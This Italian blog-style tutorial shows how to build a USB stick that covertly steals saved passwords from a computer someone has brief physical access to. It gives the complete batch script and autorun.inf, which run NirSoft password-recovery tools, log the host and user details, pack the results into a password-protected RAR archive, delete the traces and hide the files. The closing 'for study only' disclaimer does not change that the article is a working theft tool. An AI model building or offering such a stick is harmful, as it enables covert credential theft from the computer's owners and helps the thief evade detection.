Rubare Password Di Un Computer Con Una Chiavetta Usb

Il sito web Nirsoft fornisce diversi programmi gratuiti per recuperare le password salvate nel computer che si sta usando nel caso in cui le si dimenticano. E’ possibile però usare questi programmi gratuiti per altri scopi, come rubare le password del computer che si sta utilizzando.

Se un malintenzionato ha accesso fisico al computer da cui rubare le password, ha a disposizione solo pochi secondi per compiere l’”operazione”. Da questa necessità, ecco l’idea di usare una chiavetta USB. Con questo articolo, voglio semplicemente farvi vedere come sia facile creare una chiavetta USB che, inserita nel computer che ci interessa, salva le password trovate all’interno della chiavetta stessa.

Così facendo, basta collegare la chiavetta al computer che ci interessa, fare un semplice click e dopo qualche secondo staccare la chiavetta ed allontanarci dal computer con le password. Per realizzare questa chiavetta USB speciale, prima di tutto, create una cartella sul vostro desktop con il nome di Chiavetta. Questa cartella conterrà tutti i file che andranno copiati nella chiavetta.

Collegatevi alla pagina del sito web di Nirsoft per scaricare i programmi per recuperare le password. Vi consiglio di scaricare solo i programmi che vi recuperano le password che vi interessano. Se avete intenzione, ad esempio, di recuperare solo le password dei programmi di chat e quelli delle e-mail, scaricate i programmi MessenPass e Mail PassView.

Dopo aver scaricato i pacchetti con i programmi per recuperare le password, estraeteli nella cartella Chiavetta. In questa cartella lasciate solo i programmi veri e propri: cancellate, in breve, gli altri file come il readme.txt o la guida di utilizzo del programma.

A questo punto, scaricate ed installate l’ultima versione di Winrar. Andate su questa pagina e fate click sulla voce WinRAR 3.60 (Graphic and command line). Dopo aver installato Winrar, andate su Start/Risorse del computer/C:/Programmi/WinRAR, copiate ed incollate il programma Rar.exe nella cartella del desktop Chiavetta.

Adesso aprite il Blocco Note, andando su Start/Tutti i programmi/Accessori/Blocco note, e scrivete la seguente riga per ogni programma che recupera le password che avete inserito nella cartella Chiavetta:

@nomedelprogramma.exe /sverhtml nomedelprogramma.html

Al termine del file scrivete, invece, le righe:

REM Scrittura del file di log
@echo COMPUTERNAME = %COMPUTERNAME% > log.txt
@echo USERNAME = %USERNAME% >> log.txt
@echo USERDOMAIN = %USERDOMAIN% >> log.txt
@echo USERPROFILE = %USERPROFILE% >> log.txt
@echo. >> log.txt
@echo Oggi e’ %DATE% e sono le %TIME% >> log.txt

REM Compressione
@rar.exe a -pPASSWORD backup_%random%.rar *.html log.txt > nul

REM Eliminazione e celamento dei file usati
@del *.html
@del log.txt
@attrib +h *.exe
@attrib +h autorun.inf

In breve, quando avvierete questo piccolo programmino, le password verranno recuperate dal computer e salvate in diversi file .HTML. A questo punto, questi file HTML vengono inseriti in un archivio .RAR protetto da password. La password dell’archivio deve essere specificata al posto della parola PASSWORD.

La password è case sensitive: fanno differenza, quindi, le lettere maiuscole e quelle minuscole. Alla fine i programmi utilizzati per recuperare le password vengono nascosti e le pagine HTML eliminate, poichè già inserite nell’archivio .RAR. Nel mio caso (programmi MessenPass e Mail PassView), ho scritto queste righe:

@mspass.exe /sverhtml mspass.html
@mailpv.exe /sverhtml mailpv.html

REM Scrittura del file di log
@echo COMPUTERNAME = %COMPUTERNAME% > log.txt
@echo USERNAME = %USERNAME% >> log.txt
@echo USERDOMAIN = %USERDOMAIN% >> log.txt
@echo USERPROFILE = %USERPROFILE% >> log.txt
@echo. >> log.txt
@echo Oggi e’ %DATE% e sono le %TIME% >> log.txt

REM Compressione
@rar.exe a -pPASSWORD backup_%random%.rar *.html log.txt > nul

REM Eliminazione e celamento dei file usati
@del *.html
@del log.txt
@attrib +h *.exe
@attrib +h autorun.inf

Alla fine, salvate il file con il nome lancia.bat: andate semplicemente su File/Salva file con nome… e, nella finestra che si apre, scrivete lancia.bat in Nome file e selezionate Tutti i file in Salva come. Il file deve essere salvato nella Chiavetta.

Dopo aver creato il file lancia.bat, create il file autorun.inf sempre con il Blocco note:

[autorun]
open=lancia.bat
action=Preleva password

A questo punto avete finito. Nella cartella troverete i seguenti file:

Dovete semplicemente copiare tutti i file nella cartella principale della vostra chiavetta USB per concludere la sua creazione. Se volete fare delle prove, dopo aver copiato i file, estraete ed inserite la chiavetta. Verrà aperta la seguente finestra:

Se selezionate la prima voce (Preleva password) e fate click sul tasto OK, le password del computer verranno salvate all’interno dell’archivio protetto .RAR. A questo punto, basta staccare la chiavetta ed andare in un computer sicuro con Winrar installato per leggere le password trovate.

L’articolo è stato aggiornato rispetto alla pubblicazione iniziale, grazie all’aiuto del blogger Alessandro Ferrari, che ha revisionato il codice .BAT. L’articolo è puramente a scopo di studio e l’autore non si ritiene responsabile per eventuali usi impropri. Rubare password che non siano le proprie non è legale.